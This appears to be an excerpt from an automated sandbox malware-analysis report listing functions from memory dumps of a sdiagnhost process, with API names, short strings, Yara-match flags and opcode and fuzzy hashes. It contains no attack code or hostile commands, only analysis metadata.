                                                                                                        • Opcode ID: db36c71a7799e2d2524a91819fac7bf7434d1f775bb789c94a065317ed63fc99
                                                                                                        • Instruction ID: 526d3332876517f54c9fb4c868436a88816cddaa250e2f3bb57cdd392e30da48
                                                                                                        • Opcode Fuzzy Hash: db36c71a7799e2d2524a91819fac7bf7434d1f775bb789c94a065317ed63fc99
                                                                                                        • Instruction Fuzzy Hash: 7C90022130141013F5407158551960A4005DFF1305F95D112E0415554CDE19D9565222
                                                                                                        Function 04412DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: c434979a61596b87e16182137c81e4f24c0e5941e1a0e4da4d2ae4e680cb72c4
                                                                                                        • Instruction ID: 4b0e7cbeece36ce788c5691b3fd7e76d865f471f224e5aac346c2449ba1c654d
                                                                                                        • Opcode Fuzzy Hash: c434979a61596b87e16182137c81e4f24c0e5941e1a0e4da4d2ae4e680cb72c4
                                                                                                        • Instruction Fuzzy Hash: 65900221242451627945B158450550B40069FF02457D5C113A1415950C8A2AE956D621
                                                                                                        Function 04412DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 8ae5b3966fc4e43411f64a89f811720c27e60bd352a86d7d63ff36f6b6e049f6
                                                                                                        • Instruction ID: 022df304f9a49f4ddbd21884ccbfae04d0468a21df3d815acbc5ae09d79c12f0
                                                                                                        • Opcode Fuzzy Hash: 8ae5b3966fc4e43411f64a89f811720c27e60bd352a86d7d63ff36f6b6e049f6
                                                                                                        • Instruction Fuzzy Hash: 4A90023120141423F5117158460570B00098FE0245FD5C513A0425558D9B5ADA52A121
                                                                                                        Function 04412EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 7f427cebfe7d96784d1400a58c2186752cb4d129f41b59a15c5dc928bef9fa4e
                                                                                                        • Instruction ID: c49ba6e3942b19a9a058b624255b03cf160e532e3aa789054fdabed8eb02c5a5
                                                                                                        • Opcode Fuzzy Hash: 7f427cebfe7d96784d1400a58c2186752cb4d129f41b59a15c5dc928bef9fa4e
                                                                                                        • Instruction Fuzzy Hash: E690026120181413F5407558490560B00058FE0306F95C112A2065555E8F2DDD516135
                                                                                                        Function 04412E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 1b7c2fdbeefebc3ca14197c0e75538cbc2045c2cf63a0e83fbf9951521fa6708
                                                                                                        • Instruction ID: 95921e1347b3bf16acfec4990127db2dba9f2cc2ce1aceac7f906e91c2ee2a35
                                                                                                        • Opcode Fuzzy Hash: 1b7c2fdbeefebc3ca14197c0e75538cbc2045c2cf63a0e83fbf9951521fa6708
                                                                                                        • Instruction Fuzzy Hash: 5790022160141512F5017158450561A000A8FE0245FD5C123A1025555ECF29DA92A131
                                                                                                        Function 04412F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 75f3a7331727aac5be3193a66e3588dd9b348ce14136546404e8c58e71731bb5
                                                                                                        • Instruction ID: 47434c7c4f29c024c3b2d3b9c2fd164fb63fd92122b827aa056709a98822569e
                                                                                                        • Opcode Fuzzy Hash: 75f3a7331727aac5be3193a66e3588dd9b348ce14136546404e8c58e71731bb5
                                                                                                        • Instruction Fuzzy Hash: 4990026134141452F50071584515B0A0005CFF1305F95C116E1065554D8B1DDD526126
                                                                                                        Function 04412FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 381ea4bcfa3e78ea90fbccf9f8fce7bc95cc47b0c1cb7b032914be4ab03a4689
                                                                                                        • Instruction ID: 8699d9e661e67cec75ed43d18f68003623be6e519a1a020cb07011a97a6b6ba7
                                                                                                        • Opcode Fuzzy Hash: 381ea4bcfa3e78ea90fbccf9f8fce7bc95cc47b0c1cb7b032914be4ab03a4689
                                                                                                        • Instruction Fuzzy Hash: D4900221211C1052F60075684D15B0B00058FE0307F95C216A0155554CCE19D9615521
                                                                                                        Function 04412FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: afbf96c5aef9dbb681d91f17850c71f9bf367d04fbd7ee5c24b0316eecbb5c01
                                                                                                        • Instruction ID: 3e99251204f44ef2285eff2d6a80109268f16406add8fe3068f6b1b5939f0c88
                                                                                                        • Opcode Fuzzy Hash: afbf96c5aef9dbb681d91f17850c71f9bf367d04fbd7ee5c24b0316eecbb5c01
                                                                                                        • Instruction Fuzzy Hash: 619002216014105265407168894590A4005AFF1215795C222A0999550D8A5DD9655665
                                                                                                        Function 04412AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 9312c9c5c738193f6c59a16a0aa1f240babf2cc87f65e6117fd928d961be2980
                                                                                                        • Instruction ID: d6ff5f2f3d7dce4b8d13148a3411f3ac7de952b9d868ee6e78ecde3505f28ed3
                                                                                                        • Opcode Fuzzy Hash: 9312c9c5c738193f6c59a16a0aa1f240babf2cc87f65e6117fd928d961be2980
                                                                                                        • Instruction Fuzzy Hash: A2900225211410132505B558070550B00468FE5355395C122F1016550CDB25D9615121
                                                                                                        Function 04412AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 89de938099719114b93f9357ca8b2a5b9f3e64f0471d1fdd3997a2671566cd42
                                                                                                        • Instruction ID: 9ce91bee272c78f91dab633b17325fad95311e53551560d334544588b1ef5b29
                                                                                                        • Opcode Fuzzy Hash: 89de938099719114b93f9357ca8b2a5b9f3e64f0471d1fdd3997a2671566cd42
                                                                                                        • Instruction Fuzzy Hash: 7E900225221410122545B558070550F04459FE63553D5C116F1417590CCB25D9655321
                                                                                                        Function 04412B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 5de253dcd43f899fa7dd1fb1955bdec52e3db48be8645e93940dc998c8b16235
                                                                                                        • Instruction ID: 881de2629c20ca10a754cb94d08576d11d7416b5a67aae4366883f7eaeef4e3f
                                                                                                        • Opcode Fuzzy Hash: 5de253dcd43f899fa7dd1fb1955bdec52e3db48be8645e93940dc998c8b16235
                                                                                                        • Instruction Fuzzy Hash: 949002612024101365057158451561A400A8FF0205B95C122E1015590DCA29D9916125
                                                                                                        Function 04412BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: b09348266ad7be170c1bae853a2804d57b52e419b00e0b3c432ce91c798f172e
                                                                                                        • Instruction ID: 6c16ba8f8be75ab3379423718d9b529156f5ccc32073dd3b221c17669ac4c07b
                                                                                                        • Opcode Fuzzy Hash: b09348266ad7be170c1bae853a2804d57b52e419b00e0b3c432ce91c798f172e
                                                                                                        • Instruction Fuzzy Hash: 6990023120545852F54071584505A4A00158FE0309F95C112A0065694D9B29DE55B661
                                                                                                        Function 04412BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 64d58c53a9ce4a2e7cbe6e29ae20f3c66c5956c1bea0ba0ef9d26309a3899baa
                                                                                                        • Instruction ID: bd923c9595f8777356b232bb7e62f0c8e3841189eb955924c29384c33cb9ef8e
                                                                                                        • Opcode Fuzzy Hash: 64d58c53a9ce4a2e7cbe6e29ae20f3c66c5956c1bea0ba0ef9d26309a3899baa
                                                                                                        • Instruction Fuzzy Hash: B690023120141812F5807158450564E00058FE1305FD5C116A0026654DCF19DB5977A1
                                                                                                        Function 04412BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 02fcd7834b6a02c65ad86bc147ca12643bc78e7437a6b73e81f7ea5b05c9439d
                                                                                                        • Instruction ID: 7b17320c2ad493652ad1d663e4b3e1fa01d821048e4e5b437801707783aea1ea
                                                                                                        • Opcode Fuzzy Hash: 02fcd7834b6a02c65ad86bc147ca12643bc78e7437a6b73e81f7ea5b05c9439d
                                                                                                        • Instruction Fuzzy Hash: 1490023160541812F5507158451574A00058FE0305F95C112A0025654D8B59DB5576A1
                                                                                                        Function 044135C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 14cbc8ffd60c2677136d857e0766bc94b7119ab23c9ef454a9a585f3578a17c4
                                                                                                        • Instruction ID: ee9e18717a0a754e746fa092c424c3a7aa6a3ac7f43d4f2fd9d4248ef15bc76f
                                                                                                        • Opcode Fuzzy Hash: 14cbc8ffd60c2677136d857e0766bc94b7119ab23c9ef454a9a585f3578a17c4
                                                                                                        • Instruction Fuzzy Hash: C890023160551412F5007158461570A10058FE0205FA5C512A0425568D8B99DA5165A2
                                                                                                        Function 044139B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3899717810.00000000043A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043A0000, based on PE: true
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044C9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.00000000044CD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000009.00000002.3899717810.000000000453E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_43a0000_sdiagnhost.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 59ca135df3e8a5c428608ff5fed071df99823e7ed1e575a7f56b994645442eb3
                                                                                                        • Instruction ID: e1202ede455c4a9e5cc0071714ccbf84320ad0135a2bb4f91d4259666d1d4e32
                                                                                                        • Opcode Fuzzy Hash: 59ca135df3e8a5c428608ff5fed071df99823e7ed1e575a7f56b994645442eb3
                                                                                                        • Instruction Fuzzy Hash: 0F90022124546112F550715C450561A4005AFF0205F95C122A0815594D8A59D9556221
                                                                                                        Function 001D3990 Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 247COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                        • API String ID: 0-1269752229
                                                                                                        • Opcode ID: 93ed7fc7e8a2b929edb06d7e28c53e65dc06e661661fd9ebe2acb2946e254777
                                                                                                        • Instruction ID: 02c273c275e0fb4b5a4390f76cf18945027d891d6238105132adb8d53303c483
                                                                                                        • Opcode Fuzzy Hash: 93ed7fc7e8a2b929edb06d7e28c53e65dc06e661661fd9ebe2acb2946e254777
                                                                                                        • Instruction Fuzzy Hash: 7581AD72608282AFC716DF78C881AE6BFB4EF41714B14429BD8A59B342D3709B02CBD5
                                                                                                        Function 001D3B30 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108sleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 001D3BFB
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Sleep
                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                        • Opcode ID: 43ebc964fe30ff28384a1a0b1adcacce20940306f4784d9d2e59690fea1f200a
                                                                                                        • Instruction ID: 926f4eece92bdc7cf469646f6e5b97f2419d90f3c9e3bb527435c28922be0fe5
                                                                                                        • Opcode Fuzzy Hash: 43ebc964fe30ff28384a1a0b1adcacce20940306f4784d9d2e59690fea1f200a
                                                                                                        • Instruction Fuzzy Hash: 4D318EB1A40205BFD714DFA4C885FEBBBB8FF84314F00422AE5596B241D374AA41CBA6
                                                                                                        Function 001CF5CB Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 102COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InitializeUninitialize
                                                                                                        • String ID: @J7<
                                                                                                        • API String ID: 3442037557-2016760708
                                                                                                        • Opcode ID: 4ea83eec36419e3038a8aba88117c06a8ab2a6239cd382fe41852ed4661598b2
                                                                                                        • Instruction ID: c077d220b7bb507f1c38176d354c4b0f39cdc95c799a139ca4c2c25fb34c0b9c
                                                                                                        • Opcode Fuzzy Hash: 4ea83eec36419e3038a8aba88117c06a8ab2a6239cd382fe41852ed4661598b2
                                                                                                        • Instruction Fuzzy Hash: B33121B5A0060AAFDB00DFD8C880DEEB7B9FF88304B10855DE515E7214D775EE458BA0
                                                                                                        Function 001CF5D0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InitializeUninitialize
                                                                                                        • String ID: @J7<
                                                                                                        • API String ID: 3442037557-2016760708
                                                                                                        • Opcode ID: 78253a6a0592dd7ae61f6760372fbcc85cc96b5f70872e8765205b36e08a859d
                                                                                                        • Instruction ID: 234a990ff035de2e65c6dc2d8893eab5a8bb8f900866bee345ec016c3f7d32d2
                                                                                                        • Opcode Fuzzy Hash: 78253a6a0592dd7ae61f6760372fbcc85cc96b5f70872e8765205b36e08a859d
                                                                                                        • Instruction Fuzzy Hash: A6310FB6A0061AAFDB00DFD8D880DEEB7B9FF88304B10855DE515EB214D775EE458BA0
                                                                                                        Function 001C84D0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetFileAttributesW.KERNELBASE(?), ref: 001C84BA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AttributesFile
                                                                                                        • String ID: '
                                                                                                        • API String ID: 3188754299-1997036262
                                                                                                        • Opcode ID: 2e3dd970ceacec788b4ff9e5c72751df493943f6f272296c3c84728b920b7ba9
                                                                                                        • Instruction ID: 4a3a8bf1751851e9d301a0840fdee7eb4dc457ecaaba8effe1a0de5110bd9808
                                                                                                        • Opcode Fuzzy Hash: 2e3dd970ceacec788b4ff9e5c72751df493943f6f272296c3c84728b920b7ba9
                                                                                                        • Instruction Fuzzy Hash: 38E02621105A4B26E729127CACCDBBA3FCC4B67338F680F5CE8E6834D2D715D5036192
                                                                                                        Function 001C4700 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 001C4772
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: a19501024b283509392f745f754d269db80abc42ff1895e438d2e3c58ecd0413
                                                                                                        • Instruction ID: 31d50476fdc016fb2ca517917f58c39b68e671c76f386af3246956abd3893d5b
                                                                                                        • Opcode Fuzzy Hash: a19501024b283509392f745f754d269db80abc42ff1895e438d2e3c58ecd0413
                                                                                                        • Instruction Fuzzy Hash: FE0121B5E0020DABDF10DBE4DD52FADB7789B64308F004199E90997241F771EB54CB91
                                                                                                        Function 001D9770 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateProcessInternalW.KERNELBASE(?,?,00000010,?,00000010,00000258,?,?,00000044,00000258,00000010,001C8454,?,00000030,00000258,00000230), ref: 001D97D0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000009.00000002.3898415517.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_9_2_1b0000_sdiagnhost.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateInternalProcess
                                                                                                        • String ID:
